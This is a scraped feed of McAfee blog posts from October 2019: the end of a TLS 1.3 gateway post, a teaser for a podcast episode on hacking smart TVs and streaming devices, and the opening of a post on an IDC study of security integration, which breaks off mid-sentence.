In the reverse proxy scenario, McAfee Web Gateway with TLS 1.3 helps secure Internet traffic for cloud infrastructures such as Azure and AWS, even when they don’t support TLS 1.3 themselves.

The timely adoption of TLS 1.3, as previously seen with HTTP/2, will enable customers to act at the speed of cloud and make cloud usage as safe and secure as possible. To find out more, please view this whitepaper.

Could a Streaming Device Help Hackers Hijack Your TV? https://www.mcafee.com/blogs/consumer/hackable/could-a-streaming-device-help-hackers-hijack-your-tv/ https://www.mcafee.com/blogs/consumer/hackable/could-a-streaming-device-help-hackers-hijack-your-tv/#respond Tue, 22 Oct 2019 17:43:36 +0000 https://securingtomorrow.mcafee.com/?p=97154

The post Could a Streaming Device Help Hackers Hijack Your TV? appeared first on McAfee Blogs.

Streaming devices make dumb TVs smart and smart TVs, well, smarter. But as loyal “Hackable?” listeners know, the smarter something is, the more likely it is that it can be hacked. So does that mean that a hacker can interrupt your binge-watching? Or do something worse?

On the latest “Hackable?” Geoff sets up his smart TV and streaming devices in the studio and learns just how much damage hacker Craig Young can do from thousands of miles away. Listen and find out how surprisingly vulnerable smart TVs and streaming devices are!
Listen now to the award-winning podcast “Hackable?”.

Increasing Value with Security Integration https://www.mcafee.com/blogs/enterprise/increasing-value-with-security-integration/ https://www.mcafee.com/blogs/enterprise/increasing-value-with-security-integration/#respond Tue, 22 Oct 2019 15:00:35 +0000 https://securingtomorrow.mcafee.com/?p=97140

The post Increasing Value with Security Integration appeared first on McAfee Blogs.

What would your security team do with an extra 62 days?

According to a recent study by IDC, that’s the amount of time the average-sized security team can expect to regain by addressing a lack of security management integration. With just 12 percent of respondents currently using an end-to-end management suite—and with 14 percent completely reliant on ad hoc “solutions”—there’s plenty of room for improvement.

The study, “Security Integration and Automation: The Keys to Unlocking Security Value,” found that businesses who addressed lack of integration saw three main business benefits: Efficiency, Cost Reduction and Improved Staff Retention. If your business chose to do the same, which goal would your team spend its 62 days working toward?

Increasing Efficiency

When asked what concerns limited their ability to improve IT security capabilities, 44 percent reported that security was too busy with routine operations, and 37 percent cited high levels of demand for new business services.

If these teams had an extra 62 days, it could afford them the free